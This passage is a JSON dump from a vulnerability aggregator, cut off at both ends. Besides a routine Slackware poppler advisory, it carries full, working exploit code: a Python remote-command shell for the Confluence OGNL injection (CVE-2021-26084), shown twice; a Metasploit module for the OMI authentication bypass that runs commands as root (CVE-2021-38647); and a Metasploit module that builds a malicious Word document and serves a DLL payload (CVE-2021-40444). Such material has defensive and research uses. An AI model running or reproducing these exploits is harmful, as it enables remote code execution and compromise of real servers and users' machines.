\nprint('---------------------------------------------------------------') \nprint('[-] Confluence Server Webwork OGNL injection') \nprint('[-] CVE-2021-26084') \nprint('[-] https://github.com/h3v0x') \nprint('--------------------------------------------------------------- \\n') \n \n \ndef cmdExec(): \n \nwhile True: \ncmd = input('> ') \nxpl_url = url_vuln + endpoint \nxpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"} \nxpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"} \nrawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data) \n \nsoup = BeautifulSoup(rawHTML.text, 'html.parser') \nqueryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] \nprint(queryStringValue) \n \n \nbanner() \ncmdExec() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/164013/confluenceserver7124-exec.txt"}], "slackware": [{"lastseen": "2023-05-27T16:21:39", "description": "New poppler packages are available for Slackware 15.0 and -current to fix\na security issue.\n\n\nHere are the details from the Slackware 15.0 ChangeLog:\n\npatches/packages/poppler-21.12.0-i586-2_slack15.0.txz: Rebuilt.\n [PATCH] JBIG2Stream: Fix crash on broken file.\n For more information, see:\n https://vulners.com/cve/CVE-2021-30860\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 15.0:\nftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/poppler-21.12.0-i586-2_slack15.0.txz\n\nUpdated package for Slackware x86_64 15.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/poppler-21.12.0-x86_64-2_slack15.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/poppler-22.09.0-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/poppler-22.09.0-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 15.0 package:\n681572875875db923913fa9403d974d7 poppler-21.12.0-i586-2_slack15.0.txz\n\nSlackware x86_64 15.0 package:\n3ec89fbbdf94e68f4daa477faceda360 poppler-21.12.0-x86_64-2_slack15.0.txz\n\nSlackware -current package:\nb91690866d21257db9c66985ceae5051 l/poppler-22.09.0-i586-1.txz\n\nSlackware x86_64 -current package:\nbf4d3f9a1894a59a00bae784162c7780 l/poppler-22.09.0-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg poppler-21.12.0-i586-2_slack15.0.txz", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-01T20:05:47", "type": "slackware", "title": "[slackware-security] poppler", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2022-09-01T20:05:47", "id": "SSA-2022-244-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2022&m=slackware-security.337810", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-05-25T08:46:08", "description": "By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint that will cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1 (released September 8th 2021).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-31T00:00:00", "type": "zdt", "title": "Microsoft OMI Management Interface Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-31T00:00:00", "id": "1337DAY-ID-36967", "href": "https://0day.today/exploit/description/36967", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft OMI Management Interface Authentication Bypass',\n 'Description' => %q{\n By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint\n that will cause it to execute an operating system command as the root user. This vulnerability was patched in\n OMI version 1.6.8-1 (released September 8th 2021).\n },\n 'Author' => [\n 'Nir Ohfeld', # vulnerability discovery & research\n 'Shir Tamari', # vulnerability discovery & research\n 'Spencer McIntyre', # metasploit module\n 'wvu' # vulnerability research\n ],\n 'References' => [\n ['CVE', '2021-38647'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],\n ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],\n ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],\n ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']\n ],\n 'DisclosureDate' => '2021-09-14',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 5985,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'AKA' => ['OMIGOD'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/wsman'])\n ])\n end\n\n def check\n http_res = send_command('id')\n return CheckCode::Unknown if http_res.nil?\n return CheckCode::Safe unless http_res.code == 200\n\n cmd_res = parse_response(http_res)\n return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\\d+)\$\\S+\$ /\n\n return CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\")\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n result = execute_command(payload.encoded)\n if result\n print_status(result[:stdout]) unless result[:stdout].blank?\n print_error(result[:stderr]) unless result[:stderr].blank?\n end\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_command(cmd)\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n parse_response(res)\n end\n\n def parse_response(res)\n return nil unless res&.code == 200\n\n return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i\n unless return_code == 0\n print_error(\"Failed to execute command: #{cmd} (status: #{return_code})\")\n end\n\n {\n return_code: return_code,\n stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,\n stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content\n }\n end\n\n def send_command(cmd)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n ENVELOPE\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/36967", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-25T08:45:40", "description": "This Metasploit module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "zdt", "title": "Microsoft Office Word MSHTML Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-09T00:00:00", "id": "1337DAY-ID-37126", "href": "https://0day.today/exploit/description/37126", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/37126", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:51:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36694", "href": "https://0day.today/exploit/description/36694", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.12.x versions before 7.12.5\n# Tested on: Linux Distros \n# CVE : CVE-2021-26084\n\n#!/usr/bin/python3\n\n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport optparse\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\n\noptions, args = parser.parse_args()\nsession = requests.Session()\n\nurl_vuln = options.url\nendpoint = options.path\n\nif not options.url or not options.path:\n\n print('[+] Specify an url target')\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\n print('[+] Example help usage: exploit.py -h')\n exit()\n\n\ndef banner():\n\n print('---------------------------------------------------------------')\n print('[-] Confluence Server Webwork OGNL injection')\n print('[-] CVE-2021-26084')\n print('[-] https://github.com/h3v0x')\n print('--------------------------------------------------------------- \\n')\n\n\ndef cmdExec():\n\n while True:\n cmd = input('> ')\n xpl_url = url_vuln + endpoint\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = 